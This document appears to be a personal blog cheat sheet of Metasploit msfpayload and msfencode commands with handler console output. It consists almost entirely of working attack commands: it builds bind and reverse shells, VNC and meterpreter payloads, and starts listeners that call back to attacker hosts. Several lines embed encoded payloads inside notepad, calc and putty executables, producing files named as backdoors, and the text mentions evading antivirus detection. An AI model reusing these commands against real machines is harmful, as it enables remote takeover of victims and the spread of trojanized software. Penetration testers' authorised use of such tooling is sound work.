# ./msfpayload windows/meterpreter/reverse_https LHOST=10.13.37.6 LPORT=443 X > /tmp/reverse_https_443.exe
# ./msfconsole
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R |
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.69 R | ./msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
msfencode -t exe -x calc.exe -k -o naughty_calc.exe -e x86/shikata_ga_nai -c 5
msfpayload windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -x /root/notepad.exe -k -o /root/backdoor.exe -e x86/shikata_ga_nai -c 2
Metasploit Payloads - msfpayload
This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as I get more working examples.
These payloads will be detected by AV; I will cover methods of avoiding AV detection in another post.
In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.
1. For a listening shell on the target
Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe
Target:
run Listen-shell.exe
Hacker:
nc 192.168.1.110 2482
2. For a reverse shell on the target
Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E
Target:
run reverse-shell.exe
3. For a VNC listener on target
Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe
Target:
run Listen-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E
4. For a reverse VNC session
Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E
Target:
run reverse-vnc.exe
5. For a meterpreter listener
Create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe
Target:
run met-listen.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E
6. For a reverse meterpreter connection (not working yet; not sure why)
Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 X > /tmp/met-reverse.exe
Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E
Target:
run met-reverse.exe
UPDATE: The payload for 6 should read:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 X > /tmp/met-reverse.exe
=============================
Using Exploit-less Handlers (Executable Payloads)
At some point in your use of Metasploit you will need to run a payload without an exploit. This is possible with the multi/handler exploit module, which only starts the listener and waits for a payload you have delivered by other means to connect back.
Step 1. Generate your payload executable:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > met-reverse.exe
Step 2. Start your listener:
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Step 3. Run the executable and interact:
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060)
meterpreter >
The following document contains several syntax examples for creating and using stand-alone payloads, along with a discussion of avoiding antivirus detection: http://www.giac.org/certified_professionals/practicals/GCIH/01072.php
msf payload(reverse_tcp) > generate -t raw -f C:/folder/filename